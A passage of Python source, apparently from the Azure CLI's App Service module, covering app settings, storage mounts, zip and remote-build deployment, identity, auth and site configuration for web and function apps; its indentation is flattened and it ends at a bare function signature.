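#   validate_container_app_create_options(runtime='node|10.14',
#                                          deployment_container_image_name='nginx')         -> False
#   validate_container_app_create_options(multicontainer_config_type='COMPOSE',
#                                          multicontainer_config_file='docker-compose.yml') -> True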
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
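# Illustrative examples (assumed image names) of the registry extraction above:
#   parse_docker_image_name('myregistry.azurecr.io/image:tag') -> 'myregistry.azurecr.io'
#   parse_docker_image_name('localhost:5000/image')            -> 'localhost:5000'
#   parse_docker_image_name('library/nginx')                   -> None  (no '.' or ':' before the '/')
#   parse_docker_image_name('nginx')                           -> None  (no registry component at all)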
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like to accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
# Mark each setting as the slot setting
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
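# A minimal usage sketch for the parser above (values are assumed): each --settings
# entry is either a KEY=VALUE pair or a JSON blob shaped like the output of the
# "list" command, e.g.
#   --settings WEBSITE_NODE_DEFAULT_VERSION=10.14
#   --settings '[{"name": "FOO", "value": "bar", "slotSetting": true}]'
# JSON entries whose "slotSetting" flag is true (the default) are recorded as
# slot-sticky settings via update_slot_configuration_names().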
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because, if the plan was created as part of the function app,
# it can take a couple of tries before the plan becomes available
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = UA_AGENT
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
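# Rough shape of the exchange above (assumed Kudu behaviour): the zip bytes are
# POSTed with Basic auth to <scm_url>/api/zipdeploy?isAsync=true (scm_url is
# typically https://<app>.scm.azurewebsites.net), and the async deployment is then
# polled at <scm_url>/api/deployments/latest until it completes or times out.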
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ce:
# This SDK function throws an error if Status Code is 200
if ce.status_code != 200:
raise ce
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a helper method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise CLIError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise CLIError('Could not determine the current plan of the functionapp')
if not (is_plan_consumption(cmd, src_plan_info) or is_plan_elastic_premium(cmd, src_plan_info)):
raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg)
if not (is_plan_consumption(cmd, dest_plan_instance) or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def assign_identity(cmd, resource_group_name, name, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity = cmd.get_models('ManagedServiceIdentity')
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='SystemAssigned')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, slot=None):
ManagedServiceIdentity = cmd.get_models('ManagedServiceIdentity')
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='None')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
    # note: getargvalues is already used in azure.cli.core.commands,
    # and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
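# A minimal illustration of the validation semantics above (resource names are hypothetical):
#
#   validate_app_settings_in_scm(cmd, 'my-rg', 'my-app',
#                                should_have=['WEBSITE_RUN_FROM_PACKAGE'],
#                                should_not_have=['OBSOLETE_SETTING'],
#                                should_contain={'FUNCTIONS_EXTENSION_VERSION': '~2'})
#
# returns True only when every key in should_have is present on the Kudu site,
# no key in should_not_have is present, and each key/value pair in should_contain
# matches the Kudu values exactly.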
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': UA_AGENT
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
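# Illustrative behaviour of _format_fx_version (image names are examples only):
#   _format_fx_version('nginx:latest')            -> 'DOCKER|nginx:latest'
#   _format_fx_version('docker|nginx:latest')     -> 'docker|nginx:latest'   (existing prefix kept)
#   _format_fx_version('<base64>', 'COMPOSE')     -> 'COMPOSE|<base64>'
#   _format_fx_version('   ')                     -> ' '                     (single space clears the value)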
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
    # Base64-encode the file contents and return them as a UTF-8 string
return b64encode(config_file_bytes).decode('utf-8')
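# Round-trip sketch (file name is hypothetical): the compose/kube config read from
# 'docker-compose.yml' is base64-encoded here, stored in linux_fx_version as e.g.
# 'COMPOSE|<base64 payload>' via _format_fx_version, and recovered later by
# _get_linux_multicontainer_decoded_config, which splits on '|' and base64-decodes.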
# If the non-optional parameters are modified, adjust the reflection logic inside the method accordingly.
# pylint: disable=unused-argument
def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None,
windows_fx_version=None, pre_warmed_instance_count=None, php_version=None,
python_version=None, net_framework_version=None,
java_version=None, java_container=None, java_container_version=None,
remote_debugging_enabled=None, web_sockets_enabled=None,
always_on=None, auto_heal_enabled=None,
use32_bit_worker_process=None,
min_tls_version=None,
http20_enabled=None,
app_command_line=None,
ftps_state=None,
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
if pre_warmed_instance_count is not None:
pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count,
min_val=0, max_val=20)
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
int_flags = ['pre_warmed_instance_count', 'number_of_workers']
    # note: getargvalues is already used in azure.cli.core.commands,
    # and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg in int_flags and values[arg] is not None:
values[arg] = validate_and_convert_to_int(arg, values[arg])
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
